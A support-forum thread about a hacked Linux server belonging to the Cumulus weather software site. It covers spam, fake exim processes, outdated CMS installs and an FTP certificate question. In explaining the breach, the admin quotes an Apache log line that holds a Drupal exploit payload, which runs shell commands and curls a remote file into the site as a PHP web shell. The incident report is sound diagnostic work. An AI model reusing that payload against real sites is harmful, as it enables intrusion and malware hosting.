Cumulus Support

Lets hope you've fixed it so you and the wife can get on with the holiday.

It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday.

Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for.
May be helpful for other's to know what to do if they have this problem to stop these script kiddies.

Thanks Steve for your hard work getting this problem resolved while on holiday.

I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability;

85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"

I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.

It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.

Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?

I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.

Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken.

It sounds like more a php injection vulnerability than linux itself being hacked. php CMS's are plagued with security holes and by only updating them when updates are released can you try to secure a site.

Steve, on that note you would be advised to update phpBB. your running a version that needs updated

pm sent...

Not sure if this related or not but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?

I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!

At some point I may look into getting a proper certificate, now that they can be had for free.

(Short answer: no )

Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two!

The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.

I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk

Ouch. I’ll be glad to analyze the logs again, Steve.

Best regards,
Ken

Thanks, Ken, when I get chance I’ll zip them up for you.